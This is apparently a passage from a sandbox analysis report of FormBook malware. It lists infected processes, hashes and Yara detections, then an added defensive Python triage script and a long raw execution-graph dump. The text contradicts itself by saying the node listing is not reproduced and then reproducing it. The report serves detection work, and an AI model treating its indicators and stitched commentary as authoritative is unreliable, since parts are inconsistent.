                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:09:56:36
                                                          Start date:03/07/2024
                                                          Path:C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe"
                                                          Imagebase:0xb40000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:09:56:48
                                                          Start date:03/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0xb40000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true
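The process list above carries the two signals an analyst would pull out first: Target ID 1 runs under the image path of svchost.exe while its command line is the sample's own path (the sample was started suspended and its image replaced, which is why the FormBook Yara rules hit inside that process), and two further processes with unrelated images (subst.exe and the randomly named copy under Program Files (x86)) also contain FormBook code. The following is an added example, not Joe Security's code or part of the original report: it parses a condensed, constructed copy of the records above (the Yara bullets are shortened to one per process) and flags image/command-line mismatches and Yara-tagged processes. The basename comparison is case-insensitive on purpose, because Target ID 8's Path and Commandline differ only in the case of firefox.exe and must not be flagged.

```python
"""Triage of sandbox process records: flag image/command-line mismatches and Yara-tagged processes."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass, field

# Constructed input: a condensed copy of the process records from the report above.
RECORDS = r"""
Target ID:0
Path:C:\Users\user\Desktop\7RsDGpyOQk.exe
Commandline:"C:\Users\user\Desktop\7RsDGpyOQk.exe"
Has exited:true

Target ID:1
Path:C:\Windows\SysWOW64\svchost.exe
Commandline:"C:\Users\user\Desktop\7RsDGpyOQk.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:3
Path:C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
Commandline:"C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe"
Yara matches:
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Has exited:false

Target ID:4
Path:C:\Windows\SysWOW64\subst.exe
Commandline:"C:\Windows\SysWOW64\subst.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:8
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Has exited:true
"""


@dataclass
class ProcessRecord:
    target_id: str
    path: str = ""
    commandline: str = ""
    yara_rules: list = field(default_factory=list)


def parse_records(text: str) -> list[ProcessRecord]:
    """Split the 'Key:value' blocks into records; '•' bullets attach to the current record."""
    records: list[ProcessRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            m = re.match(r"•\s*Rule:\s*([^,]+)", line)
            if current is not None and m:
                current.yara_rules.append(m.group(1).strip())
            continue
        key, _, value = line.partition(":")  # first ':' only, so 'C:\...' stays intact
        key, value = key.strip(), value.strip()
        if key == "Target ID":
            current = ProcessRecord(target_id=value)
            records.append(current)
        elif current is None:
            continue
        elif key == "Path":
            current.path = value
        elif key == "Commandline":
            current.commandline = value
    return records


def image_from_commandline(cmdline: str) -> str:
    """Return the executable named by a Windows command line (quoted or first token)."""
    m = re.match(r'\s*"([^"]*)"', cmdline)
    if m:
        return m.group(1)
    parts = cmdline.split()
    return parts[0] if parts else ""


def triage(records: list[ProcessRecord]) -> list[tuple[str, str, str]]:
    """Return (target_id, reason, detail) findings for the two checks."""
    findings = []
    for r in records:
        image = image_from_commandline(r.commandline)
        # Case-insensitive: Windows paths are, and Target 8 differs only in case.
        if r.path and image and ntpath.basename(r.path).lower() != ntpath.basename(image).lower():
            findings.append((r.target_id, "image/commandline mismatch", f"{r.path} <- {image}"))
        if r.yara_rules:
            findings.append((r.target_id, "yara", ", ".join(sorted(set(r.yara_rules)))))
    return findings


def flagged_ids(findings: list[tuple[str, str, str]], reason: str) -> set[str]:
    return {tid for tid, why, _ in findings if why == reason}


if __name__ == "__main__":
    for tid, why, detail in triage(parse_records(RECORDS)):
        print(f"Target {tid}: {why}: {detail}")
```

The mismatch check is the cheap, durable one: a hollowed process keeps the replaced image's path in its PEB while its command line still names the original file, and that disagreement survives across sandbox vendors and EDR telemetry alike. The Yara check only tells you where the payload ended up, which is why subst.exe shows up as a host despite a perfectly consistent path.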


                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:2.6%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:55
execution_graph: the report renders this as an interactive call graph (2000 nodes, 55 limit nodes, per the coverage figures above); the raw node/edge listing is not reproduced here. Win32 API calls that appear as labelled nodes in that listing: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleFileNameW, GetFullPathNameW, GetFileAttributesW, FindFirstFileW, FindClose, CreateFileW, ReadFile, WriteFile, SetFilePointerEx, CloseHandle, CharUpperBuffW, CharLowerBuffW, VirtualAlloc, FreeLibrary, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, GetProcAddress, ExitProcess, RaiseException, RtlAllocateHeap, RtlFreeHeap, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, VariantClear, GetLastError. The remaining node labels are C runtime internals (__cinit, __NMSG_WRITE, _memmove, _wcscat, _wcscpy, _strcat, __getptd_noexit, __malloc_crt, __write_nolock, __alloc_osfhnd, __lseeki64, _doexit, __i64tow, __itow, ___crtCorExitProcess, std::exception::exception) and a symbol labelled Mailbox.
98555->98507 98556->98507 98557->98507 98558->98478 98559->98507 98561 1ff683 __NMSG_WRITE 98560->98561 98562 1ff6c2 98561->98562 98565 1ff6b8 98561->98565 98566 1ff769 98561->98566 98562->98514 98562->98520 98565->98562 98568 1a7a24 61 API calls 98565->98568 98566->98562 98569 1a7a24 61 API calls 98566->98569 98567->98517 98568->98565 98569->98566 98570->98535 98571->98547 98573 1a92c9 Mailbox 98572->98573 98574 1df5c8 98573->98574 98579 1a92d3 98573->98579 98575 1c0ff6 Mailbox 59 API calls 98574->98575 98577 1df5d4 98575->98577 98576 1a92da 98576->98553 98579->98576 98580 1a9df0 59 API calls Mailbox 98579->98580 98580->98579 98582 1a77c7 59 API calls 98581->98582 98583 1ff905 98582->98583 98584 1a7b76 59 API calls 98583->98584 98585 1ff919 98584->98585 98586 1ff658 61 API calls 98585->98586 98589 1ff93b 98585->98589 98587 1ff935 98586->98587 98587->98589 98590 1a79ab 59 API calls 98587->98590 98588 1ff658 61 API calls 98588->98589 98589->98588 98591 1ff9b5 98589->98591 98592 1a79ab 59 API calls 98589->98592 98594 1a7c8e 59 API calls 98589->98594 98590->98589 98593 1a79ab 59 API calls 98591->98593 98592->98589 98595 1ff9ce 98593->98595 98594->98589 98596 1a7c8e 59 API calls 98595->98596 98597 1ff9da 98596->98597 98599 1ff9e9 Mailbox 98597->98599 98601 1a80d7 59 API calls 2 library calls 98597->98601 98599->98181 98600->98183 98601->98599 98603 1a56dd 98602->98603 98604 1a5702 98602->98604 98603->98604 98609 1a56ec 98603->98609 98605 1a7eec 59 API calls 98604->98605 98608 20349a 98605->98608 98606 2034c9 98606->98214 98608->98606 98626 203436 ReadFile SetFilePointerEx 98608->98626 98627 1a7a84 59 API calls 2 library calls 98608->98627 98610 1a5c18 59 API calls 98609->98610 98612 2035ba 98610->98612 98613 1a5632 61 API calls 98612->98613 98614 2035c8 98613->98614 98616 2035d8 Mailbox 98614->98616 98628 1a793a 61 API calls Mailbox 98614->98628 98616->98214 98617->98192 98618->98219 98619->98220 98620->98190 98621->98190 98622->98198 98623->98205 98624->98213 
98625->98218 98626->98608 98627->98608 98628->98616 98630 1f665e 98629->98630 98631 1f6641 98629->98631 98630->98229 98631->98630 98633 1f6621 59 API calls Mailbox 98631->98633 98633->98631 98634 1a3633 98635 1a366a 98634->98635 98636 1a3688 98635->98636 98637 1a36e7 98635->98637 98675 1a36e5 98635->98675 98641 1a375d PostQuitMessage 98636->98641 98642 1a3695 98636->98642 98639 1dd31c 98637->98639 98640 1a36ed 98637->98640 98638 1a36ca DefWindowProcW 98648 1a36d8 98638->98648 98684 1b11d0 10 API calls Mailbox 98639->98684 98643 1a36f2 98640->98643 98644 1a3715 SetTimer RegisterWindowMessageW 98640->98644 98641->98648 98645 1dd38f 98642->98645 98646 1a36a0 98642->98646 98649 1dd2bf 98643->98649 98650 1a36f9 KillTimer 98643->98650 98644->98648 98651 1a373e CreatePopupMenu 98644->98651 98699 202a16 71 API calls _memset 98645->98699 98652 1a36a8 98646->98652 98653 1a3767 98646->98653 98656 1dd2f8 MoveWindow 98649->98656 98657 1dd2c4 98649->98657 98679 1a44cb Shell_NotifyIconW _memset 98650->98679 98651->98648 98659 1dd374 98652->98659 98660 1a36b3 98652->98660 98682 1a4531 64 API calls _memset 98653->98682 98655 1dd343 98685 1b11f3 341 API calls Mailbox 98655->98685 98656->98648 98665 1dd2c8 98657->98665 98666 1dd2e7 SetFocus 98657->98666 98659->98638 98698 1f817e 59 API calls Mailbox 98659->98698 98668 1a374b 98660->98668 98669 1a36be 98660->98669 98661 1dd3a1 98661->98638 98661->98648 98664 1a375b 98664->98648 98665->98669 98670 1dd2d1 98665->98670 98666->98648 98667 1a370c 98680 1a3114 DeleteObject DestroyWindow Mailbox 98667->98680 98681 1a45df 81 API calls _memset 98668->98681 98669->98638 98686 1a44cb Shell_NotifyIconW _memset 98669->98686 98683 1b11d0 10 API calls Mailbox 98670->98683 98675->98638 98677 1dd368 98687 1a43db 98677->98687 98679->98667 98680->98648 98681->98664 98682->98664 98683->98648 98684->98655 98685->98669 98686->98677 98688 1a4406 _memset 98687->98688 98700 1a4213 98688->98700 98691 1a448b 98693 1a44c1 Shell_NotifyIconW 98691->98693 98694 
1a44a5 Shell_NotifyIconW 98691->98694 98695 1a44b3 98693->98695 98694->98695 98704 1a410d 98695->98704 98697 1a44ba 98697->98675 98698->98675 98699->98661 98701 1dd638 98700->98701 98702 1a4227 98700->98702 98701->98702 98703 1dd641 DestroyIcon 98701->98703 98702->98691 98726 203226 62 API calls _W_store_winword 98702->98726 98703->98702 98705 1a4129 98704->98705 98706 1a4200 Mailbox 98704->98706 98707 1a7b76 59 API calls 98705->98707 98706->98697 98708 1a4137 98707->98708 98709 1dd5dd LoadStringW 98708->98709 98710 1a4144 98708->98710 98713 1dd5f7 98709->98713 98711 1a7d2c 59 API calls 98710->98711 98712 1a4159 98711->98712 98712->98713 98714 1a416a 98712->98714 98715 1a7c8e 59 API calls 98713->98715 98716 1a4174 98714->98716 98717 1a4205 98714->98717 98720 1dd601 98715->98720 98719 1a7c8e 59 API calls 98716->98719 98718 1a81a7 59 API calls 98717->98718 98723 1a417e _memset _wcscpy 98718->98723 98719->98723 98721 1a7e0b 59 API calls 98720->98721 98720->98723 98722 1dd623 98721->98722 98725 1a7e0b 59 API calls 98722->98725 98724 1a41e6 Shell_NotifyIconW 98723->98724 98724->98706 98725->98723 98726->98691 98727 1dff06 98728 1dff10 98727->98728 98732 1aac90 Mailbox _memmove 98727->98732 98868 1a8e34 59 API calls Mailbox 98728->98868 98739 1ab685 98732->98739 98740 1aa1b7 98732->98740 98744 1aa097 Mailbox 98732->98744 98746 1a7f41 59 API calls 98732->98746 98758 1f66f4 Mailbox 59 API calls 98732->98758 98760 1c0ff6 59 API calls Mailbox 98732->98760 98761 1ab416 98732->98761 98762 1aa000 341 API calls 98732->98762 98764 1e0c94 98732->98764 98766 1e0ca2 98732->98766 98769 1ab37c 98732->98769 98776 1aade2 Mailbox 98732->98776 98784 21c5f4 98732->98784 98816 207be0 98732->98816 98822 21bf80 98732->98822 98869 1f7405 59 API calls 98732->98869 98870 21c4a7 85 API calls 2 library calls 98732->98870 98734 1c0ff6 59 API calls Mailbox 98734->98744 98736 1ab5da 98878 20a0b5 89 API calls 4 library calls 98736->98878 98738 1ab5d5 98742 1a81a7 59 API calls 98738->98742 98873 20a0b5 
89 API calls 4 library calls 98739->98873 98742->98740 98743 1e047f 98872 20a0b5 89 API calls 4 library calls 98743->98872 98744->98734 98744->98736 98744->98738 98744->98740 98744->98743 98747 1a81a7 59 API calls 98744->98747 98749 1a77c7 59 API calls 98744->98749 98751 1f7405 59 API calls 98744->98751 98754 1e0e00 98744->98754 98756 1c2f80 67 API calls __cinit 98744->98756 98759 1aa6ba 98744->98759 98862 1aca20 341 API calls 2 library calls 98744->98862 98863 1aba60 60 API calls Mailbox 98744->98863 98746->98732 98747->98744 98749->98744 98750 1e048e 98751->98744 98753 1f66f4 Mailbox 59 API calls 98753->98740 98877 20a0b5 89 API calls 4 library calls 98754->98877 98756->98744 98758->98732 98876 20a0b5 89 API calls 4 library calls 98759->98876 98760->98732 98867 1af803 341 API calls 98761->98867 98762->98732 98874 1a9df0 59 API calls Mailbox 98764->98874 98875 20a0b5 89 API calls 4 library calls 98766->98875 98768 1e0c86 98768->98740 98768->98753 98865 1a9e9c 60 API calls Mailbox 98769->98865 98771 1ab38d 98866 1a9e9c 60 API calls Mailbox 98771->98866 98776->98739 98776->98740 98776->98768 98777 1e00e0 VariantClear 98776->98777 98778 20d2e5 101 API calls 98776->98778 98779 20d2e6 101 API calls 98776->98779 98780 21e237 130 API calls 98776->98780 98781 1b2123 95 API calls 98776->98781 98782 21474d 341 API calls 98776->98782 98783 22251d 62 API calls 98776->98783 98864 1a9df0 59 API calls Mailbox 98776->98864 98871 1f7405 59 API calls 98776->98871 98777->98776 98778->98776 98779->98776 98780->98776 98781->98776 98782->98776 98783->98776 98785 1a77c7 59 API calls 98784->98785 98786 21c608 98785->98786 98787 1a77c7 59 API calls 98786->98787 98788 21c610 98787->98788 98789 1a77c7 59 API calls 98788->98789 98790 21c618 98789->98790 98791 1a9997 84 API calls 98790->98791 98815 21c626 98791->98815 98792 1a7d2c 59 API calls 98792->98815 98793 21c80f 98794 21c83c Mailbox 98793->98794 98881 1a9b9c 59 API calls Mailbox 98793->98881 98794->98732 98796 21c7f6 98800 1a7e0b 59 
API calls 98796->98800 98797 1a7a84 59 API calls 98797->98815 98798 21c811 98801 1a7e0b 59 API calls 98798->98801 98799 1a81a7 59 API calls 98799->98815 98802 21c803 98800->98802 98803 21c820 98801->98803 98805 1a7c8e 59 API calls 98802->98805 98806 1a7c8e 59 API calls 98803->98806 98804 1a7faf 59 API calls 98808 21c6bd CharUpperBuffW 98804->98808 98805->98793 98806->98793 98807 1a7faf 59 API calls 98809 21c77d CharUpperBuffW 98807->98809 98879 1a859a 68 API calls 98808->98879 98880 1ac707 69 API calls 2 library calls 98809->98880 98812 1a7e0b 59 API calls 98812->98815 98813 1a9997 84 API calls 98813->98815 98814 1a7c8e 59 API calls 98814->98815 98815->98792 98815->98793 98815->98794 98815->98796 98815->98797 98815->98798 98815->98799 98815->98804 98815->98807 98815->98812 98815->98813 98815->98814 98817 207bec 98816->98817 98818 1c0ff6 Mailbox 59 API calls 98817->98818 98819 207bfa 98818->98819 98820 207c08 98819->98820 98821 1a77c7 59 API calls 98819->98821 98820->98732 98821->98820 98823 21bfc5 98822->98823 98824 21bfab 98822->98824 98883 21a528 59 API calls Mailbox 98823->98883 98882 20a0b5 89 API calls 4 library calls 98824->98882 98827 21bfd0 98828 1aa000 340 API calls 98827->98828 98829 21c031 98828->98829 98830 21c0c3 98829->98830 98834 21c072 98829->98834 98855 21bfbd Mailbox 98829->98855 98831 21c119 98830->98831 98832 21c0c9 98830->98832 98833 1a9997 84 API calls 98831->98833 98831->98855 98904 207ba4 59 API calls 98832->98904 98835 21c12b 98833->98835 98884 207581 59 API calls Mailbox 98834->98884 98838 1a7faf 59 API calls 98835->98838 98841 21c14f CharUpperBuffW 98838->98841 98839 21c0ec 98905 1a5ea1 59 API calls Mailbox 98839->98905 98840 21c0a2 98885 1af5c0 98840->98885 98845 21c169 98841->98845 98844 21c0f4 Mailbox 98906 1afe40 341 API calls 2 library calls 98844->98906 98846 21c170 98845->98846 98847 21c1bc 98845->98847 98907 207581 59 API calls Mailbox 98846->98907 98849 1a9997 84 API calls 98847->98849 98850 21c1c4 98849->98850 98908 1a9fbd 60 
API calls 98850->98908 98853 21c19e 98854 1af5c0 340 API calls 98853->98854 98854->98855 98855->98732 98856 21c1ce 98856->98855 98857 1a9997 84 API calls 98856->98857 98858 21c1e9 98857->98858 98909 1a5ea1 59 API calls Mailbox 98858->98909 98860 21c1f9 98910 1afe40 341 API calls 2 library calls 98860->98910 98862->98744 98863->98744 98864->98776 98865->98771 98866->98761 98867->98739 98868->98732 98869->98732 98870->98732 98871->98776 98872->98750 98873->98768 98874->98768 98875->98768 98876->98740 98877->98736 98878->98740 98879->98815 98880->98815 98881->98794 98882->98855 98883->98827 98884->98840 98886 1af61a 98885->98886 98887 1af7b0 98885->98887 98888 1e4848 98886->98888 98889 1af626 98886->98889 98890 1a7f41 59 API calls 98887->98890 98891 21bf80 341 API calls 98888->98891 99000 1af3f0 341 API calls 2 library calls 98889->99000 98892 1af6ec Mailbox 98890->98892 98894 1e4856 98891->98894 98899 1af743 98892->98899 98901 203e73 3 API calls 98892->98901 98911 21e24b 98892->98911 98914 20cde5 98892->98914 98994 1a4faa 98892->98994 98897 1af790 98894->98897 99002 20a0b5 89 API calls 4 library calls 98894->99002 98896 1af65d 98896->98892 98896->98894 98896->98897 98897->98855 98899->98897 99001 1a9df0 59 API calls Mailbox 98899->99001 98901->98899 98904->98839 98905->98844 98906->98855 98907->98853 98908->98856 98909->98860 98910->98855 98912 21cdf1 130 API calls 98911->98912 98913 21e25b 98912->98913 98913->98899 98915 1a77c7 59 API calls 98914->98915 98916 20ce1a 98915->98916 98917 1a77c7 59 API calls 98916->98917 98918 20ce23 98917->98918 98919 20ce37 98918->98919 99136 1a9c9c 59 API calls 98918->99136 98921 1a9997 84 API calls 98919->98921 98922 20ce54 98921->98922 98923 20cf55 98922->98923 98924 20ce76 98922->98924 98936 20cf85 Mailbox 98922->98936 99003 1a4f3d 98923->99003 98925 1a9997 84 API calls 98924->98925 98927 20ce82 98925->98927 98929 1a81a7 59 API calls 98927->98929 98932 20ce8e 98929->98932 98930 20cf81 98931 1a77c7 59 API calls 98930->98931 
98930->98936 98934 20cfb6 98931->98934 98938 20cea2 98932->98938 98939 20ced4 98932->98939 98933 1a4f3d 136 API calls 98933->98930 98935 1a77c7 59 API calls 98934->98935 98937 20cfbf 98935->98937 98936->98899 98941 1a77c7 59 API calls 98937->98941 98942 1a81a7 59 API calls 98938->98942 98940 1a9997 84 API calls 98939->98940 98943 20cee1 98940->98943 98944 20cfc8 98941->98944 98945 20ceb2 98942->98945 98946 1a81a7 59 API calls 98943->98946 98947 1a77c7 59 API calls 98944->98947 98948 1a7e0b 59 API calls 98945->98948 98949 20ceed 98946->98949 98950 20cfd1 98947->98950 98951 20cebc 98948->98951 99137 204cd3 GetFileAttributesW 98949->99137 98954 1a9997 84 API calls 98950->98954 98952 1a9997 84 API calls 98951->98952 98955 20cec8 98952->98955 98957 20cfde 98954->98957 98958 1a7c8e 59 API calls 98955->98958 98956 20cef6 98959 20cf09 98956->98959 98962 1a7b52 59 API calls 98956->98962 98960 1a46f9 59 API calls 98957->98960 98958->98939 98961 1a9997 84 API calls 98959->98961 98969 20cf0f 98959->98969 98963 20cff9 98960->98963 98964 20cf36 98961->98964 98962->98959 98965 1a7b52 59 API calls 98963->98965 99138 203a2b 75 API calls Mailbox 98964->99138 98967 20d008 98965->98967 98968 20d03c 98967->98968 98970 1a7b52 59 API calls 98967->98970 98971 1a81a7 59 API calls 98968->98971 98969->98936 98972 20d019 98970->98972 98973 20d04a 98971->98973 98972->98968 98975 1a7d2c 59 API calls 98972->98975 98974 1a7c8e 59 API calls 98973->98974 98976 20d058 98974->98976 98977 20d02e 98975->98977 98978 1a7c8e 59 API calls 98976->98978 98979 1a7d2c 59 API calls 98977->98979 98980 20d066 98978->98980 98979->98968 98981 1a7c8e 59 API calls 98980->98981 98982 20d074 98981->98982 98983 1a9997 84 API calls 98982->98983 98984 20d080 98983->98984 99027 2042ad 98984->99027 98986 20d091 98987 203e73 3 API calls 98986->98987 98988 20d09b 98987->98988 98989 1a9997 84 API calls 98988->98989 98993 20d0cc 98988->98993 98990 20d0b9 98989->98990 99081 2093df 98990->99081 98992 1a4faa 84 API calls 
98992->98936 98993->98992 98995 1a4fbb 98994->98995 98996 1a4fb4 98994->98996 98998 1a4fca 98995->98998 98999 1a4fdb FreeLibrary 98995->98999 98997 1c55d6 __fcloseall 83 API calls 98996->98997 98997->98995 98998->98899 98999->98998 99000->98896 99001->98899 99002->98897 99139 1a4d13 99003->99139 99008 1ddd0f 99011 1a4faa 84 API calls 99008->99011 99009 1a4f68 LoadLibraryExW 99149 1a4cc8 99009->99149 99013 1ddd16 99011->99013 99015 1a4cc8 3 API calls 99013->99015 99017 1ddd1e 99015->99017 99016 1a4f8f 99016->99017 99018 1a4f9b 99016->99018 99175 1a506b 99017->99175 99020 1a4faa 84 API calls 99018->99020 99022 1a4fa0 99020->99022 99022->98930 99022->98933 99024 1ddd45 99183 1a5027 99024->99183 99028 2042c9 99027->99028 99029 2042dc 99028->99029 99030 2042ce 99028->99030 99032 1a77c7 59 API calls 99029->99032 99031 1a81a7 59 API calls 99030->99031 99033 2042d7 Mailbox 99031->99033 99034 2042e4 99032->99034 99033->98986 99035 1a77c7 59 API calls 99034->99035 99036 2042ec 99035->99036 99037 1a77c7 59 API calls 99036->99037 99038 2042f7 99037->99038 99039 1a77c7 59 API calls 99038->99039 99040 2042ff 99039->99040 99041 1a77c7 59 API calls 99040->99041 99042 204307 99041->99042 99043 1a77c7 59 API calls 99042->99043 99044 20430f 99043->99044 99045 1a77c7 59 API calls 99044->99045 99046 204317 99045->99046 99047 1a77c7 59 API calls 99046->99047 99048 20431f 99047->99048 99049 1a46f9 59 API calls 99048->99049 99050 204336 99049->99050 99051 1a46f9 59 API calls 99050->99051 99052 20434f 99051->99052 99053 1a7b52 59 API calls 99052->99053 99054 20435b 99053->99054 99055 20436e 99054->99055 99056 1a7e8c 59 API calls 99054->99056 99057 1a7b52 59 API calls 99055->99057 99056->99055 99058 204377 99057->99058 99059 204387 99058->99059 99060 1a7e8c 59 API calls 99058->99060 99061 1a81a7 59 API calls 99059->99061 99060->99059 99062 204393 99061->99062 99063 1a7c8e 59 API calls 99062->99063 99064 20439f 99063->99064 99610 20445f 59 API calls 99064->99610 99066 2043ae 99611 20445f 59 
API calls 99066->99611 99068 2043c1 99069 1a7b52 59 API calls 99068->99069 99070 2043cb 99069->99070 99071 2043d0 99070->99071 99072 2043e2 99070->99072 99073 1a7e0b 59 API calls 99071->99073 99074 1a7b52 59 API calls 99072->99074 99075 2043dd 99073->99075 99076 2043eb 99074->99076 99079 1a7c8e 59 API calls 99075->99079 99077 204409 99076->99077 99078 1a7e0b 59 API calls 99076->99078 99080 1a7c8e 59 API calls 99077->99080 99078->99075 99079->99077 99080->99033 99082 2093ec __write_nolock 99081->99082 99083 1c0ff6 Mailbox 59 API calls 99082->99083 99084 209449 99083->99084 99085 1a538e 59 API calls 99084->99085 99086 209453 99085->99086 99087 2091e9 GetSystemTimeAsFileTime 99086->99087 99088 20945e 99087->99088 99089 1a5045 85 API calls 99088->99089 99090 209471 _wcscmp 99089->99090 99091 209542 99090->99091 99092 209495 99090->99092 99093 2099be 96 API calls 99091->99093 99642 2099be 99092->99642 99109 20950e _wcscat 99093->99109 99097 1a506b 74 API calls 99099 209567 99097->99099 99098 20954b 99098->98993 99100 1a506b 74 API calls 99099->99100 99102 209577 99100->99102 99101 2094c3 _wcscat _wcscpy 99649 1c432e 58 API calls __wsplitpath_helper 99101->99649 99103 1a506b 74 API calls 99102->99103 99105 209592 99103->99105 99106 1a506b 74 API calls 99105->99106 99107 2095a2 99106->99107 99108 1a506b 74 API calls 99107->99108 99110 2095bd 99108->99110 99109->99097 99109->99098 99111 1a506b 74 API calls 99110->99111 99112 2095cd 99111->99112 99113 1a506b 74 API calls 99112->99113 99114 2095dd 99113->99114 99115 1a506b 74 API calls 99114->99115 99116 2095ed 99115->99116 99612 209b6d GetTempPathW GetTempFileNameW 99116->99612 99118 2095f9 99119 1c548b 115 API calls 99118->99119 99127 20960a 99119->99127 99122 1a506b 74 API calls 99122->99127 99127->99098 99127->99122 99133 2096c4 99127->99133 99613 1c4a93 99127->99613 99626 1c55d6 99133->99626 99136->98919 99137->98956 99138->98969 99188 1a4d61 99139->99188 99142 1a4d3a 99144 1a4d4a FreeLibrary 99142->99144 99145 1a4d53 
99142->99145 99143 1a4d61 2 API calls 99143->99142 99144->99145 99146 1c548b 99145->99146 99192 1c54a0 99146->99192 99148 1a4f5c 99148->99008 99148->99009 99350 1a4d94 99149->99350 99152 1a4d94 2 API calls 99155 1a4ced 99152->99155 99153 1a4d08 99156 1a4dd0 99153->99156 99154 1a4cff FreeLibrary 99154->99153 99155->99153 99155->99154 99157 1c0ff6 Mailbox 59 API calls 99156->99157 99158 1a4de5 99157->99158 99159 1a538e 59 API calls 99158->99159 99160 1a4df1 _memmove 99159->99160 99161 1a4e2c 99160->99161 99163 1a4ee9 99160->99163 99164 1a4f21 99160->99164 99162 1a5027 69 API calls 99161->99162 99167 1a4e35 99162->99167 99354 1a4fe9 CreateStreamOnHGlobal 99163->99354 99365 209ba5 95 API calls 99164->99365 99168 1a506b 74 API calls 99167->99168 99170 1ddcd0 99167->99170 99174 1a4ec9 99167->99174 99360 1a5045 99167->99360 99168->99167 99171 1a5045 85 API calls 99170->99171 99172 1ddce4 99171->99172 99173 1a506b 74 API calls 99172->99173 99173->99174 99174->99016 99176 1a507d 99175->99176 99177 1dddf6 99175->99177 99389 1c5812 99176->99389 99180 209393 99587 2091e9 99180->99587 99182 2093a9 99182->99024 99184 1dddb9 99183->99184 99185 1a5036 99183->99185 99592 1c5e90 99185->99592 99187 1a503e 99189 1a4d2e 99188->99189 99190 1a4d6a LoadLibraryA 99188->99190 99189->99142 99189->99143 99190->99189 99191 1a4d7b GetProcAddress 99190->99191 99191->99189 99195 1c54ac __alloc_osfhnd 99192->99195 99193 1c54bf 99241 1c8d68 58 API calls __getptd_noexit 99193->99241 99195->99193 99197 1c54f0 99195->99197 99196 1c54c4 99242 1c8ff6 9 API calls __lseeki64 99196->99242 99211 1d0738 99197->99211 99200 1c54f5 99201 1c54fe 99200->99201 99202 1c550b 99200->99202 99243 1c8d68 58 API calls __getptd_noexit 99201->99243 99204 1c5535 99202->99204 99205 1c5515 99202->99205 99226 1d0857 99204->99226 99244 1c8d68 58 API calls __getptd_noexit 99205->99244 99206 1c54cf __alloc_osfhnd @_EH4_CallFilterFunc@8 99206->99148 99212 1d0744 __alloc_osfhnd 99211->99212 99213 1c9e4b __lock 58 API calls 
99212->99213 99224 1d0752 99213->99224 99214 1d07cd 99251 1c8a5d 58 API calls 2 library calls 99214->99251 99215 1d07c6 99246 1d084e 99215->99246 99218 1d07d4 99218->99215 99252 1ca06b InitializeCriticalSectionAndSpinCount 99218->99252 99219 1d0843 __alloc_osfhnd 99219->99200 99221 1c9ed3 __mtinitlocknum 58 API calls 99221->99224 99223 1d07fa EnterCriticalSection 99223->99215 99224->99214 99224->99215 99224->99221 99249 1c6e8d 59 API calls __lock 99224->99249 99250 1c6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99224->99250 99234 1d0877 __wopenfile 99226->99234 99227 1d0891 99257 1c8d68 58 API calls __getptd_noexit 99227->99257 99229 1d0896 99258 1c8ff6 9 API calls __lseeki64 99229->99258 99231 1c5540 99245 1c5562 LeaveCriticalSection LeaveCriticalSection _fseek 99231->99245 99232 1d0aaf 99254 1d87f1 99232->99254 99234->99227 99240 1d0a4c 99234->99240 99259 1c3a0b 60 API calls 2 library calls 99234->99259 99236 1d0a45 99236->99240 99260 1c3a0b 60 API calls 2 library calls 99236->99260 99238 1d0a64 99238->99240 99261 1c3a0b 60 API calls 2 